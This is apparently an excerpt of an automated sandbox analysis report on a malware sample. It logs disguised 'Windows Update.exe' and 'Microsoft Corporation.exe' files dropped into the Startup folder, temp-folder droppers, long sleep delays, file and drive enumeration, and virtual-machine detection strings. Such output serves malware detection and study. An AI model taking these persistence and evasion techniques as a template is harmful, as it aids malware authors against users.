          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeMemory allocated: 3550000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeMemory allocated: 4360000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeMemory allocated: 3F60000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeMemory allocated: DE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeMemory allocated: 3D50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeMemory allocated: 3810000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeMemory allocated: 40A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeMemory allocated: 33B0000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeMemory allocated: 2F30000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeMemory allocated: 3D80000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeMemory allocated: 3220000 memory commit | memory reserve | memory write watch
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeWindow / User API: threadDelayed 391Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeWindow / User API: threadDelayed 409Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeWindow / User API: threadDelayed 3714Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeWindow / User API: threadDelayed 3709Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeWindow / User API: threadDelayed 592Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeWindow / User API: foregroundWindowGot 414Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeWindow / User API: foregroundWindowGot 422Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1074
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe TID: 6448Thread sleep count: 391 > 30Jump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe TID: 1280Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224Thread sleep count: 409 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 2244Thread sleep count: 3714 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 2244Thread sleep time: -3714000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300Thread sleep count: 3709 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300Thread sleep time: -3709000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3796Thread sleep count: 307 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3796Thread sleep time: -30700s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224Thread sleep time: -34000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300Thread sleep count: 592 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300Thread sleep time: -592000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe TID: 4888Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe TID: 1916Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00AE1754h1_2_00AE1718
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 15_2_00A31718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00A31754h15_2_00A31718
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 22_2_00511718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00511754h22_2_00511718
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00AE29E2
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_009E9998 FindFirstFileW,4_2_009E9998
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_009F9998 FindFirstFileW,14_2_009F9998
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 15_2_00A329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,15_2_00A329E2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_00979998 FindFirstFileW,21_2_00979998
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 22_2_005129E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,22_2_005129E2
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00AE2B8C
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: #Windows 10 Microsoft Hyper-V Server
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Microsoft Hyper-V Server
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Microsoft Hyper-V Server
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.0000000001556000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
          Source: Amcache.hve.1.drBinary or memory string: vmci.sys
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
          Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.0000000001556000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x~T
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: "Windows 8 Microsoft Hyper-V Server
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
          Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
          Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, server.exe, 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: Hyper-V (guest)
          Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: RRqyIX.exe, 0000000F.00000003.2526814497.0000000000B5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Microsoft Hyper-V Server
          Source: RRqyIX.exe, 00000016.00000002.2612085202.0000000000A85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
          Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Microsoft Hyper-V Server
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: )Windows 8 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, server.exe, 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %Windows 2012 Microsoft Hyper-V Server
          Source: Amcache.hve.1.drBinary or memory string: VMware
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: $Windows 8.1 Microsoft Hyper-V Server
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ,Windows 2012 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Microsoft Hyper-V Server
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
          Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Essential Server Solutions without Hyper-V
